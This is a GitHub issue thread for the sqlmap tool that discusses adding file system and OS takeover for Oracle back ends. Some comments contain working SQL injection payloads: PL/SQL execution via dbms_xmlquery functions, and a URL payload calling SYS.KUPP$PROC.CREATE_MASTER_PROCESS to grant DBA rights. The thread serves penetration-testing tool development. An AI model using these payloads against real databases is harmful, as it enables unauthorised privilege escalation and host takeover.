sqlmap icon indicating copy to clipboard operation
sqlmap copied to clipboard

Published 20 hours ago verified publisher icon sqlmapproject

File and operating system takeover support for Oracle

Open bdamele opened this issue 13 years ago • 8 comments

Add support to takeover the file system when the back-end DBMS is Oracle.

References:

  • http://delicious.com/inquis/oracle

bdamele avatar Jun 26 '12 15:06 bdamele

We were looking at this: http://code.google.com/p/bsqlbf-v2/ as an example of how to do takeover on Oracle DB. Perhaps we will have a pull request ready soon <3

infodox avatar Jul 03 '12 16:07 infodox

@stamparm @sqlmapproject @inquisb this is possible, though you would have to provide multiple methods and bruteforce your way to the right one or use DBMS fingerprinting to figure out the right trick. Would certainly be a worthy addition to it! See my above link.

infodox avatar Jul 05 '12 19:07 infodox

More details: http://kitkatsatonthemat.blogspot.com/2011/11/i-herd-you-like-oracle-dawg-so-i-put.html

bdamele avatar Jul 06 '12 16:07 bdamele

Maybe this helps: In Oracle there are 2 Function granted to PUBLIC by default: dbms_xmlquery.newcontext() dbms_xmlquery.getxml()

These 2 functions allow execution of anonymous PLSQL blocks within an SQL Statement. Extremly helpful when injecting in Oracle Databases. Examples: select dbms_xmlquery.newcontext('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual

select dbms_xmlquery.getxml('declare pragma autonomous_transaction; begin execute immediate '' create synonym asdf for SCHEMA.TABLE ''; commit; end;') from dual

With this technique it would be possible to create a Java Package with Runtime.exec() to takeover the Databasehost (user needs the rights(grants) for this operation, but this can be checked via the oracle system tables).

firefart avatar Aug 30 '12 10:08 firefart

@infodox where's your pull request? :)

bdamele avatar Dec 05 '12 00:12 bdamele

http://www.6code.net/2015/08/execute-os-command-in-oracle-database.html

stamparm avatar Oct 19 '15 09:10 stamparm

Bump

steelbrain avatar Jul 28 '16 13:07 steelbrain

There seem to be a few methods to execute OS Commands and through the SYS.KUPP$PROC.CREATE_MASTER_PROCESS function in Oracle up to 11g2.

For example if a URL is vulnerable to AND based SQLi, you could run <url>/id=2' and (Select SYS.KUPP$PROC.CREATE_MASTER_PROCESS('EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT dba TO user;''''; END;'';') from dual) is not null--

I used this in a test scenario and was able to create a user and grant it DBA on Oracle 11g2.

I came across this whitepaper that goes into alot more detail, including privilege escalation. I hope it might be helpfull. https://media.blackhat.com/bh-us-10/whitepapers/Siddharth/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf

SebaNuss avatar Apr 12 '18 12:04 SebaNuss